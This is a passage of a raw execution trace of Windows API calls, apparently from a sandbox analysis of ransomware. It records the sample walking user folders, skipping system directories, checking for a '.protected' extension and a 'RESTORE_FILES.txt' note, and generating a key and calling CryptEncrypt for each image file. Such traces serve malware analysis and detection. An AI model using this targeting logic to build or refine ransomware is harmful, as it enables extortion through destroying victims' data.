lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.242] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\..") returned 57 [0093.242] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.242] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.protected", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.protected") returned 89 [0093.242] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz.dat.protected", lpSrch=".protected") returned=".protected" [0093.242] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="Windows") returned -1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files") returned -1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files (x86)") returned -1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="$Recycle.bin") returned 1 [0093.242] lstrcmpiW (lpString1="Default Pictures", lpString2="System Volume Information") returned -1 [0093.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned 71 [0093.242] lstrcmpW (lpString1="Default Pictures", lpString2=".") returned 1 [0093.242] lstrcmpW (lpString1="Default Pictures", lpString2="..") returned 1 [0093.243] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned 73 [0093.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.243] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.243] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.243] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.243] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.243] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\.") returned 73 [0093.243] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.243] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.243] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.243] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.243] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.243] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\..") returned 74 [0093.243] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.243] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.244] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.244] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt") returned 89 [0093.244] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.244] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files") returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files (x86)") returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="$Recycle.bin") returned 1 [0093.244] lstrcmpiW (lpString1="usertile10.bmp", lpString2="System Volume Information") returned 1 [0093.244] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 86 [0093.244] StrStrIW (lpFirst="usertile10.bmp", lpSrch=".protected") returned 0x0 [0093.244] lstrcmpW (lpString1="usertile10.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files") returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files (x86)") returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="$Recycle.bin") returned 1 [0093.244] lstrcmpiW (lpString1="usertile11.bmp", lpString2="System Volume Information") returned 1 [0093.244] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 86 [0093.244] StrStrIW (lpFirst="usertile11.bmp", lpSrch=".protected") returned 0x0 [0093.244] lstrcmpW (lpString1="usertile11.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.244] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.244] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Windows") returned -1 [0093.244] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files") returned 1 [0093.245] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files (x86)") returned 1 [0093.245] lstrcmpiW (lpString1="usertile12.bmp", lpString2="$Recycle.bin") returned 1 [0093.245] lstrcmpiW (lpString1="usertile12.bmp", lpString2="System Volume Information") returned 1 [0093.245] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 86 [0093.245] StrStrIW (lpFirst="usertile12.bmp", lpSrch=".protected") returned 0x0 [0093.245] lstrcmpW (lpString1="usertile12.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.245] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Windows") returned -1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files") returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files (x86)") returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="$Recycle.bin") returned 1 [0093.245] lstrcmpiW (lpString1="usertile13.bmp", lpString2="System Volume Information") returned 1 [0093.245] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 86 [0093.245] StrStrIW (lpFirst="usertile13.bmp", lpSrch=".protected") returned 0x0 [0093.245] lstrcmpW (lpString1="usertile13.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.245] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Windows") returned -1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files") returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files (x86)") returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="$Recycle.bin") returned 1 [0093.245] lstrcmpiW (lpString1="usertile14.bmp", lpString2="System Volume Information") returned 1 [0093.245] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 86 [0093.245] StrStrIW (lpFirst="usertile14.bmp", lpSrch=".protected") returned 0x0 [0093.245] lstrcmpW (lpString1="usertile14.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.246] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Windows") returned -1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files") returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files (x86)") returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="$Recycle.bin") returned 1 [0093.246] lstrcmpiW (lpString1="usertile15.bmp", lpString2="System Volume Information") returned 1 [0093.246] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 86 [0093.246] StrStrIW (lpFirst="usertile15.bmp", lpSrch=".protected") returned 0x0 [0093.246] lstrcmpW (lpString1="usertile15.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.246] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Windows") returned -1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files") returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files (x86)") returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="$Recycle.bin") returned 1 [0093.246] lstrcmpiW (lpString1="usertile16.bmp", lpString2="System Volume Information") returned 1 [0093.246] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 86 [0093.246] StrStrIW (lpFirst="usertile16.bmp", lpSrch=".protected") returned 0x0 [0093.246] lstrcmpW (lpString1="usertile16.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.246] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Windows") returned -1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files") returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files (x86)") returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="$Recycle.bin") returned 1 [0093.246] lstrcmpiW (lpString1="usertile17.bmp", lpString2="System Volume Information") returned 1 [0093.246] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 86 [0093.246] StrStrIW (lpFirst="usertile17.bmp", lpSrch=".protected") returned 0x0 [0093.246] lstrcmpW (lpString1="usertile17.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.247] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Windows") returned -1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files") returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files (x86)") returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="$Recycle.bin") returned 1 [0093.247] lstrcmpiW (lpString1="usertile18.bmp", lpString2="System Volume Information") returned 1 [0093.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 86 [0093.247] StrStrIW (lpFirst="usertile18.bmp", lpSrch=".protected") returned 0x0 [0093.247] lstrcmpW (lpString1="usertile18.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.247] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.247] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.247] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Windows") returned -1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files") returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files (x86)") returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="$Recycle.bin") returned 1 [0093.247] lstrcmpiW (lpString1="usertile19.bmp", lpString2="System Volume Information") returned 1 [0093.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 86 [0093.247] StrStrIW (lpFirst="usertile19.bmp", lpSrch=".protected") returned 0x0 [0093.247] lstrcmpW (lpString1="usertile19.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.247] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.247] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.247] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Windows") returned -1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files") returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files (x86)") returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="$Recycle.bin") returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="System Volume Information") returned 1 [0093.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 86 [0093.248] StrStrIW (lpFirst="usertile20.bmp", lpSrch=".protected") returned 0x0 [0093.248] lstrcmpW (lpString1="usertile20.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.248] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Windows") returned -1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files") returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files (x86)") returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="$Recycle.bin") returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="System Volume Information") returned 1 [0093.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 86 [0093.248] StrStrIW (lpFirst="usertile21.bmp", lpSrch=".protected") returned 0x0 [0093.248] lstrcmpW (lpString1="usertile21.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.248] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Windows") returned -1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files") returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files (x86)") returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="$Recycle.bin") returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="System Volume Information") returned 1 [0093.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 86 [0093.248] StrStrIW (lpFirst="usertile22.bmp", lpSrch=".protected") returned 0x0 [0093.248] lstrcmpW (lpString1="usertile22.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 